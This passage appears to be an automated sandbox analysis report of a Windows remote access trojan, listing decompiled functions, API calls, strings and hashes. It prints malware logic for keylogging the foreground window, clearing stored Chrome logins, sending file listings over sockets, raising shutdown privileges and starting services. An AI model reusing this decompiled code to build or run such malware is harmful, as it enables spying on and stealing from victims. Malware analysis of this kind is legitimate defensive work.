                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00409F30
                                                                                                • [Chrome StoredLogins not found], xrefs: 00409F89
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                • API String ID: 2018770650-1062637481
                                                                                                • Opcode ID: 9a9fe7a555929900bd0572798e7eaaecf8adc300ba41119c6a82a0682d9ec2aa
                                                                                                • Instruction ID: ab77fa6c1c073b2ddb725fe74a9ec32399497067327e986f690607c0ddb412c9
                                                                                                • Opcode Fuzzy Hash: 9a9fe7a555929900bd0572798e7eaaecf8adc300ba41119c6a82a0682d9ec2aa
                                                                                                • Instruction Fuzzy Hash: 17018F61A801065ACA04B6B6DD5B8AE7728B911708B50023FF802B62E3FD7A9D45C29B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00414367() {
                                                                                                				void* _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                
                                                                                                				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                                                                                                				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                				_v24.PrivilegeCount = 1;
                                                                                                				_v12 = 2;
                                                                                                				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                                                                                				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
                                                                                                			}







                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00414374
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0041437B
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041438D
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004143AC
                                                                                                • GetLastError.KERNEL32 ref: 004143B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3534403312-3733053543
                                                                                                • Opcode ID: e32cf0ecdafaeb7bc66f76128e60d35e97101dae4b310d9329eff96bc68064cc
                                                                                                • Instruction ID: 29d46af238e859157db81d8d4cc04ae3e3855c8580ca535270b4c7ff37804c09
                                                                                                • Opcode Fuzzy Hash: e32cf0ecdafaeb7bc66f76128e60d35e97101dae4b310d9329eff96bc68064cc
                                                                                                • Instruction Fuzzy Hash: 92F03AB2801229ABDB109BA0ED0DAEF7F7CEF4571AF210064B905A6052D6348A44CBB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E0040783D(signed int __ecx, void* __edx, void* __eflags) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t105;
                                                                                                				intOrPtr* _t110;
                                                                                                				signed int _t120;
                                                                                                				void* _t132;
                                                                                                				void* _t153;
                                                                                                				void* _t156;
                                                                                                				signed int _t157;
                                                                                                				signed int _t158;
                                                                                                				signed int _t159;
                                                                                                				signed int _t160;
                                                                                                				signed int _t171;
                                                                                                				signed int _t184;
                                                                                                				signed int _t186;
                                                                                                				void* _t204;
                                                                                                				char* _t218;
                                                                                                				char* _t219;
                                                                                                				signed int _t263;
                                                                                                				void* _t266;
                                                                                                				void* _t268;
                                                                                                				void* _t274;
                                                                                                				void* _t276;
                                                                                                				intOrPtr _t277;
                                                                                                				void* _t278;
                                                                                                				void* _t281;
                                                                                                
                                                                                                				_t186 = __ecx;
                                                                                                				E00452248(E004537C2, _t274);
                                                                                                				_t277 = _t276 - 0x300;
                                                                                                				_push(_t266);
                                                                                                				 *((intOrPtr*)(_t274 - 0x10)) = _t277;
                                                                                                				_t184 = _t186;
                                                                                                				 *(_t274 - 0x18) = _t184;
                                                                                                				E004020C7(_t184, _t274 - 0x9c);
                                                                                                				 *(_t274 - 0x1c) =  *(_t274 - 0x1c) | 0xffffffff;
                                                                                                				 *_t184 = 0;
                                                                                                				 *(_t274 - 4) =  *(_t274 - 4) & 0x00000000;
                                                                                                				_t261 = _t184 + 4;
                                                                                                				E00404943(_t184 + 4);
                                                                                                				_t105 = E004049DE(_t184 + 4, _t266, _t184 + 4);
                                                                                                				_t283 = _t105;
                                                                                                				if(_t105 == 0) {
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					goto L4;
                                                                                                				} else {
                                                                                                					_t277 = _t277 - 0x18;
                                                                                                					_t259 = E00402FA9(_t274 - 0x6c, _t274 + 0x38, 0x46e250);
                                                                                                					E00402F85(_t184, _t277, _t178, _t283, _t274 + 0x50);
                                                                                                					_push(0x64);
                                                                                                					_t184 = _t184 & 0xffffff00 | E00404BB7(_t184, _t261, _t178, _t283) == 0xffffffff;
                                                                                                					E00401FB9();
                                                                                                					_t285 = _t184;
                                                                                                					if(_t184 != 0) {
                                                                                                						E00404F18(_t261, _t259);
                                                                                                						 *((intOrPtr*)(_t274 - 0x20)) = 1;
                                                                                                						_push(0x4696f0);
                                                                                                						_t156 = _t274 - 0x20;
                                                                                                						L3:
                                                                                                						_push(_t156);
                                                                                                						L4:
                                                                                                						E00432EDA();
                                                                                                					}
                                                                                                				}
                                                                                                				_t262 = E004022FC(_t274 + 0x20, _t274 - 0x30);
                                                                                                				_t110 = E004022BF(_t274 + 0x20, _t274 - 0x34);
                                                                                                				E00408269(_t274 - 0x3c,  *((intOrPtr*)(E004022FC(_t274 + 0x20, _t274 - 0x38))),  *_t110,  *_t108);
                                                                                                				_t278 = _t277 + 0xc;
                                                                                                				_t253 = _t274 + 8;
                                                                                                				_t268 = FindFirstFileW(E00401EDD(E00407677(_t274 - 0x6c, _t274 + 8, _t285, "*")), _t274 - 0x304);
                                                                                                				 *(_t274 - 0x1c) = _t268;
                                                                                                				E00401EE2();
                                                                                                				_t285 = _t268 - 0xffffffff;
                                                                                                				if(_t268 != 0xffffffff) {
                                                                                                					goto L7;
                                                                                                				} else {
                                                                                                					_t277 = _t278 - 0x18;
                                                                                                					E00402076(_t184, _t277, 0x460734);
                                                                                                					_push(0x65);
                                                                                                					E00404BB7(_t184,  *(_t274 - 0x18) + 4, _t253, _t285);
                                                                                                					E00404F18( *(_t274 - 0x18) + 4, _t253);
                                                                                                					 *((intOrPtr*)(_t274 - 0x24)) = 2;
                                                                                                					_push(0x4696f0);
                                                                                                					_t156 = _t274 - 0x24;
                                                                                                					goto L3;
                                                                                                				}
                                                                                                				while(1) {
                                                                                                					L7:
                                                                                                					_t120 = FindNextFileW(_t268, _t274 - 0x304);
                                                                                                					__eflags = _t120;
                                                                                                					if(_t120 == 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t184 =  *(_t274 - 0x18);
                                                                                                					__eflags =  *_t184;
                                                                                                					if( *_t184 == 0) {
                                                                                                						__eflags =  *(_t274 - 0x304) & 0x00000010;
                                                                                                						if(( *(_t274 - 0x304) & 0x00000010) == 0) {
                                                                                                							L31:
                                                                                                							E00404260(_t184, _t274 - 0x84, _t274 - 0x2d8);
                                                                                                							_t262 = E004022FC(_t274 - 0x84, _t274 - 0x3c);
                                                                                                							_t271 = E004022BF(_t274 - 0x84, _t274 - 0x38);
                                                                                                							E00408269(_t274 - 0x30,  *((intOrPtr*)(E004022FC(_t274 - 0x84, _t274 - 0x34))),  *_t138,  *_t136);
                                                                                                							_t278 = _t278 + 0xc;
                                                                                                							__eflags = E004080DA(_t274 - 0x84, _t274 + 0x20, 0) - 0xffffffff;
                                                                                                							if(__eflags == 0) {
                                                                                                								L34:
                                                                                                								E00401EE2();
                                                                                                								_t268 =  *(_t274 - 0x1c);
                                                                                                								continue;
                                                                                                							} else {
                                                                                                								E00401FC3(_t274 - 0x9c, _t253, _t271, E0040209D(_t184, _t274 - 0x54, _t253, __eflags, _t274 - 0x304, 0x250));
                                                                                                								E00401FB9();
                                                                                                								_t278 = _t278 - 0x18;
                                                                                                								_t253 = E00402F85(_t184, _t274 - 0x54, E00417D8C(_t184, _t274 - 0xb4, _t274 + 8), __eflags, 0x46e250);
                                                                                                								E00402F85(_t184, _t278, _t151, __eflags, _t274 - 0x9c);
                                                                                                								_push(0x66);
                                                                                                								_t153 = E00404BB7(_t184, _t184 + 4, _t151, __eflags);
                                                                                                								__eflags = _t153 - 0xffffffff;
                                                                                                								_t184 = _t184 & 0xffffff00 | _t153 == 0xffffffff;
                                                                                                								E00401FB9();
                                                                                                								E00401FB9();
                                                                                                								__eflags = _t184;
                                                                                                								if(_t184 == 0) {
                                                                                                									goto L34;
                                                                                                								} else {
                                                                                                									 *((intOrPtr*)(_t274 - 0x2c)) = 4;
                                                                                                									_push(0x4696f0);
                                                                                                									_t156 = _t274 - 0x2c;
                                                                                                									goto L3;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t218 = ".";
                                                                                                							_t157 = _t274 - 0x2d8;
                                                                                                							while(1) {
                                                                                                								_t253 =  *_t157;
                                                                                                								__eflags = _t253 -  *_t218;
                                                                                                								if(_t253 !=  *_t218) {
                                                                                                									break;
                                                                                                								}
                                                                                                								__eflags = _t253;
                                                                                                								if(_t253 == 0) {
                                                                                                									L17:
                                                                                                									_t158 = 0;
                                                                                                								} else {
                                                                                                									_t253 =  *((intOrPtr*)(_t157 + 2));
                                                                                                									_t42 =  &(_t218[2]); // 0x2e0000
                                                                                                									__eflags = _t253 -  *_t42;
                                                                                                									if(_t253 !=  *_t42) {
                                                                                                										break;
                                                                                                									} else {
                                                                                                										_t157 = _t157 + 4;
                                                                                                										_t218 =  &(_t218[4]);
                                                                                                										__eflags = _t253;
                                                                                                										if(_t253 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L17;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								L19:
                                                                                                								__eflags = _t158;
                                                                                                								if(_t158 == 0) {
                                                                                                									goto L31;
                                                                                                								} else {
                                                                                                									_t219 = L"..";
                                                                                                									_t159 = _t274 - 0x2d8;
                                                                                                									while(1) {
                                                                                                										_t253 =  *_t159;
                                                                                                										__eflags = _t253 -  *_t219;
                                                                                                										if(_t253 !=  *_t219) {
                                                                                                											break;
                                                                                                										}
                                                                                                										__eflags = _t253;
                                                                                                										if(_t253 == 0) {
                                                                                                											L25:
                                                                                                											_t160 = 0;
                                                                                                										} else {
                                                                                                											_t253 =  *((intOrPtr*)(_t159 + 2));
                                                                                                											_t45 =  &(_t219[2]); // 0x2e
                                                                                                											__eflags = _t253 -  *_t45;
                                                                                                											if(_t253 !=  *_t45) {
                                                                                                												break;
                                                                                                											} else {
                                                                                                												_t159 = _t159 + 4;
                                                                                                												_t219 =  &(_t219[4]);
                                                                                                												__eflags = _t253;
                                                                                                												if(_t253 != 0) {
                                                                                                													continue;
                                                                                                												} else {
                                                                                                													goto L25;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                										L27:
                                                                                                										__eflags = _t160;
                                                                                                										if(__eflags == 0) {
                                                                                                											goto L31;
                                                                                                										} else {
                                                                                                											_t253 = E00408293(_t184, _t274 - 0xb4, _t274 + 8, __eflags, E00404260(_t184, _t274 - 0x54, _t274 - 0x2d8));
                                                                                                											E00403098(_t184, _t274 - 0x6c, _t163, _t262, __eflags, "\\");
                                                                                                											E00401EE2();
                                                                                                											E00401EE2();
                                                                                                											_t281 = _t278 - 0x18;
                                                                                                											E004074B3(_t184, _t281, _t163, __eflags, _t274 + 0x20);
                                                                                                											_t278 = _t281 - 0x18;
                                                                                                											E004074B3(_t184, _t278, _t163, __eflags, _t274 - 0x6c);
                                                                                                											_t171 = E00407C95(_t184, _t163, __eflags);
                                                                                                											__eflags = _t171;
                                                                                                											if(_t171 != 0) {
                                                                                                												E00401EE2();
                                                                                                												goto L31;
                                                                                                											} else {
                                                                                                												 *((intOrPtr*)(_t274 - 0x28)) = 3;
                                                                                                												_push(0x4696f0);
                                                                                                												_t156 = _t274 - 0x28;
                                                                                                												goto L3;
                                                                                                											}
                                                                                                										}
                                                                                                										goto L37;
                                                                                                									}
                                                                                                									asm("sbb eax, eax");
                                                                                                									_t160 = _t159 | 0x00000001;
                                                                                                									__eflags = _t160;
                                                                                                									goto L27;
                                                                                                								}
                                                                                                								goto L37;
                                                                                                							}
                                                                                                							asm("sbb eax, eax");
                                                                                                							_t158 = _t157 | 0x00000001;
                                                                                                							__eflags = _t158;
                                                                                                							goto L19;
                                                                                                						}
                                                                                                						L37:
                                                                                                						E00401FB9();
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						E00401FB9();
                                                                                                						_t132 = E00401FB9();
                                                                                                						 *[fs:0x0] =  *((intOrPtr*)(_t274 - 0xc));
                                                                                                						return _t132;
                                                                                                					} else {
                                                                                                						FindClose(_t268);
                                                                                                						_t204 = _t184 + 4;
                                                                                                					}
                                                                                                					L10:
                                                                                                					E00404F18(_t204, _t253);
                                                                                                					goto L37;
                                                                                                				}
                                                                                                				 *(_t274 - 4) =  *(_t274 - 4) | 0xffffffff;
                                                                                                				FindClose(_t268);
                                                                                                				_t263 =  *(_t274 - 0x18);
                                                                                                				_t253 = E00402FA9(_t274 - 0x54, _t274 + 0x38, 0x46e250);
                                                                                                				E00402F85(_t184, _t278 - 0x18, _t123, __eflags, _t274 + 0x50);
                                                                                                				_push(0x67);
                                                                                                				E00404BB7(_t184, _t263 + 4, _t123, __eflags);
                                                                                                				E00401FB9();
                                                                                                				_t204 = _t263 + 4;
                                                                                                				goto L10;
                                                                                                			}






























                                                                                                0x00407c10
                                                                                                0x00407c16
                                                                                                0x00407c1b
                                                                                                0x00407c23
                                                                                                0x00407c28
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00407842
                                                                                                  • Part of subcall function 004049DE: connect.WS2_32(FFFFFFFF,?,?), ref: 004049F6
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004078DE
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040793C
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00407994
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004079AB
                                                                                                  • Part of subcall function 00404F18: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E268,00000000,00404D9D,00000000,00000000,00000000,00000000,0046E268,0000000C), ref: 00404F22
                                                                                                  • Part of subcall function 00404F18: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F31
                                                                                                  • Part of subcall function 00404F18: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F3A
                                                                                                • FindClose.KERNEL32(00000000), ref: 00407BE9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$File$EventException@8FirstH_prologHandleNextObjectSingleThrowWaitconnectsend
                                                                                                • String ID:
                                                                                                • API String ID: 4178801697-0
                                                                                                • Opcode ID: c0dd36f45bb29b03b341cc8f12e83686cdbdbd765a526dd0e731187da9d4c9b8
                                                                                                • Instruction ID: ddac6cc700c1d826fe857a47d8fbc5167297111700952098bd10f7650e54566a
                                                                                                • Opcode Fuzzy Hash: c0dd36f45bb29b03b341cc8f12e83686cdbdbd765a526dd0e731187da9d4c9b8
                                                                                                • Instruction Fuzzy Hash: 30C18F719041099ACB14FBA1CD82AED7779AF50308F1041BBE506B71E1EB78AF49CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E004089F0(void* __ecx, intOrPtr _a4) {
                                                                                                				long _v8;
                                                                                                				void _v38;
                                                                                                				short _v40;
                                                                                                				char _v296;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				struct HKL__* _t20;
                                                                                                				void* _t30;
                                                                                                				signed int _t32;
                                                                                                				void* _t36;
                                                                                                
                                                                                                				_t30 = __ecx;
                                                                                                				E00432D80(_t36,  &_v296, 0, 0x100);
                                                                                                				_v40 = 0;
                                                                                                				_t32 = 7;
                                                                                                				memset( &_v38, 0, _t32 << 2);
                                                                                                				asm("stosw");
                                                                                                				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
                                                                                                				GetKeyState(0x10);
                                                                                                				GetKeyboardState( &_v296);
                                                                                                				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
                                                                                                				E00404260(_t30, _a4,  &_v40);
                                                                                                				return _a4;
                                                                                                			}














                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(00000000,?,00000000), ref: 00408A24
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00408A2F
                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00408A36
                                                                                                • GetKeyState.USER32(00000010), ref: 00408A40
                                                                                                • GetKeyboardState.USER32(?), ref: 00408A4D
                                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                                • String ID:
                                                                                                • API String ID: 3566172867-0
                                                                                                • Opcode ID: 68725428f3adce387c2005b2b6eac9a3a573156eb01c1af9bc8d7a97e283f8bf
                                                                                                • Instruction ID: 954dbeb75a3367939cd3f671746bd10b6718b1437367162c7db61e97fd0e5538
                                                                                                • Opcode Fuzzy Hash: 68725428f3adce387c2005b2b6eac9a3a573156eb01c1af9bc8d7a97e283f8bf
                                                                                                • Instruction Fuzzy Hash: 8C115272A0020CBBDB10DBE0ED49FDA77BCEB4C755F000465FA04EA1A1E6B5E9549BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00416D71(char _a4) {
                                                                                                				signed int _t14;
                                                                                                				void* _t17;
                                                                                                				void* _t18;
                                                                                                
                                                                                                				_t14 = 0;
                                                                                                				_t18 = OpenSCManagerW(0, 0, 0x10);
                                                                                                				_t17 = OpenServiceW(_t18, E00401EDD( &_a4), 0x10);
                                                                                                				if(_t17 != 0) {
                                                                                                					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
                                                                                                					CloseServiceHandle(_t18);
                                                                                                					CloseServiceHandle(_t17);
                                                                                                				} else {
                                                                                                					CloseServiceHandle(_t18);
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				return _t14;
                                                                                                			}







                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,004169F7,00000000), ref: 00416D7D
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,004169F7,00000000), ref: 00416D91
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004169F7,00000000), ref: 00416D9E
                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,004169F7,00000000), ref: 00416DA9
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004169F7,00000000), ref: 00416DBB
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,004169F7,00000000), ref: 00416DBE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                • String ID:
                                                                                                • API String ID: 276877138-0
                                                                                                • Opcode ID: ef07e6c86237960c802dac9a5680cb0117c874ae721aa68fb8168dbb6c57e619
                                                                                                • Instruction ID: b3f61633ed7c41ea8795e5440c840da447dc60db2636738ac19c69509a0bb623
                                                                                                • Opcode Fuzzy Hash: ef07e6c86237960c802dac9a5680cb0117c874ae721aa68fb8168dbb6c57e619
                                                                                                • Instruction Fuzzy Hash: 9BF0B43210122C7FD2106F65EC88DBF3B6CDBC1BA9B11002AFA0996191CA78CDC5A5F8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 46%
                                                                                                			E0040D0FF() {
                                                                                                				signed int _v32;
                                                                                                				void* _t13;
                                                                                                				void* _t22;
                                                                                                				signed int _t61;
                                                                                                				void* _t63;
                                                                                                				void* _t64;
                                                                                                				void* _t66;
                                                                                                
                                                                                                				_t63 = (_t61 & 0xfffffff8) - 0x20;
                                                                                                				while(1) {
                                                                                                					_v32 = _v32 & 0x00000000;
                                                                                                					_t52 = E00401F87(0x46e5a8);
                                                                                                					E004108B4(_t10, "override",  &_v32);
                                                                                                					_t13 = _v32 - 1;
                                                                                                					if(_t13 == 0) {
                                                                                                						goto L5;
                                                                                                					}
                                                                                                					_t22 = _t13 - 1;
                                                                                                					if(_t22 == 0) {
                                                                                                						_push(1);
                                                                                                						_t67 = _t63 - 0x18;
                                                                                                						E004074B3(0x46e590, _t63 - 0x18, _t52, __eflags, 0x46e590);
                                                                                                						_push(L"pth_unenc");
                                                                                                						E00410B7B(0x80000001, E00401EDD(E00417CCA( &_v32, 0x46e5a8)));
                                                                                                						E00401EE2();
                                                                                                						_push(1);
                                                                                                						E00402076(0x46e590, _t67 + 0x20 - 0x18, "3.3.2 Pro");
                                                                                                						_push("v");
                                                                                                						E00410AD6(0x46e5a8, E00401F87(0x46e5a8));
                                                                                                						E00410199();
                                                                                                						ExitProcess(0);
                                                                                                					}
                                                                                                					_t74 = _t22 != 1;
                                                                                                					if(_t22 != 1) {
                                                                                                						L6:
                                                                                                						Sleep(0xbb8);
                                                                                                						continue;
                                                                                                					}
                                                                                                					E0040ADA8();
                                                                                                					L5:
                                                                                                					_push(1);
                                                                                                					_t64 = _t63 - 0x18;
                                                                                                					E004074B3(0x46e590, _t64, _t52, _t74, 0x46e590);
                                                                                                					_push(L"pth_unenc");
                                                                                                					E00410B7B(0x80000001, E00401EDD(E00417CCA( &_v32, 0x46e5a8)));
                                                                                                					E00401EE2();
                                                                                                					_push(1);
                                                                                                					_t66 = _t64 + 0x20 - 0x18;
                                                                                                					E00402076(0x46e590, _t66, "3.3.2 Pro");
                                                                                                					_push("v");
                                                                                                					E00410AD6(0x46e5a8, E00401F87(0x46e5a8));
                                                                                                					_t63 = _t66 + 0x20;
                                                                                                					goto L6;
                                                                                                				}
                                                                                                			}










                                                                                                0x0040d193
                                                                                                0x0040d198
                                                                                                0x0040d1a6
                                                                                                0x0040d1ab
                                                                                                0x00000000
                                                                                                0x0040d1ab

                                                                                                APIs
                                                                                                  • Part of subcall function 004108B4: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108D4
                                                                                                  • Part of subcall function 004108B4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 004108F2
                                                                                                  • Part of subcall function 004108B4: RegCloseKey.ADVAPI32(?), ref: 004108FD
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040D1B3
                                                                                                • ExitProcess.KERNEL32 ref: 0040D228
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 3.3.2 Pro$override$pth_unenc
                                                                                                • API String ID: 2281282204-3274502919
                                                                                                • Opcode ID: 895b86eccd8d28ed9292c6040119295059f38bf5f6a2924e23802ee28b4e815b
                                                                                                • Instruction ID: ab9f1b4df45feb8c48745f3e59a62def2f7dbb76d07eca292e9077384f3f1501
                                                                                                • Opcode Fuzzy Hash: 895b86eccd8d28ed9292c6040119295059f38bf5f6a2924e23802ee28b4e815b
                                                                                                • Instruction Fuzzy Hash: DA21E571F043012BD60476B68C57BAE35999F95708F24442FB801AB2D6FEBD8A4083DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E0044B90C(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                                				short _v8;
                                                                                                				short _t17;
                                                                                                				signed int _t18;
                                                                                                				signed int _t23;
                                                                                                				signed int _t25;
                                                                                                				signed int _t26;
                                                                                                				signed int _t27;
                                                                                                				void* _t30;
                                                                                                				void* _t31;
                                                                                                				intOrPtr _t32;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr* _t36;
                                                                                                				intOrPtr* _t37;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t23 = _a4;
                                                                                                				if(_t23 == 0) {
                                                                                                					L21:
                                                                                                					_t12 = _a8 + 8; // 0xfde8fe81
                                                                                                					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                                                                                                						_t17 = _v8;
                                                                                                						if(_t17 == 0) {
                                                                                                							_t17 = GetACP();
                                                                                                						}
                                                                                                						L25:
                                                                                                						return _t17;
                                                                                                					}
                                                                                                					L22:
                                                                                                					_t17 = 0;
                                                                                                					goto L25;
                                                                                                				}
                                                                                                				_t18 = 0;
                                                                                                				if( *_t23 == 0) {
                                                                                                					goto L21;
                                                                                                				}
                                                                                                				_t36 = 0x45b018;
                                                                                                				_t25 = _t23;
                                                                                                				while(1) {
                                                                                                					_t30 =  *_t25;
                                                                                                					if(_t30 !=  *_t36) {
                                                                                                						break;
                                                                                                					}
                                                                                                					if(_t30 == 0) {
                                                                                                						L7:
                                                                                                						_t26 = _t18;
                                                                                                						L9:
                                                                                                						if(_t26 == 0) {
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						_t37 = 0x45b020;
                                                                                                						_t27 = _t23;
                                                                                                						while(1) {
                                                                                                							_t31 =  *_t27;
                                                                                                							if(_t31 !=  *_t37) {
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_t31 == 0) {
                                                                                                								L17:
                                                                                                								if(_t18 != 0) {
                                                                                                									_t17 = E004374BA(_t23, _t23);
                                                                                                									goto L25;
                                                                                                								}
                                                                                                								_t8 = _a8 + 8; // 0xfde8fe81
                                                                                                								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t17 = _v8;
                                                                                                								goto L25;
                                                                                                							}
                                                                                                							_t32 =  *((intOrPtr*)(_t27 + 2));
                                                                                                							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t27 = _t27 + 4;
                                                                                                							_t37 = _t37 + 4;
                                                                                                							if(_t32 != 0) {
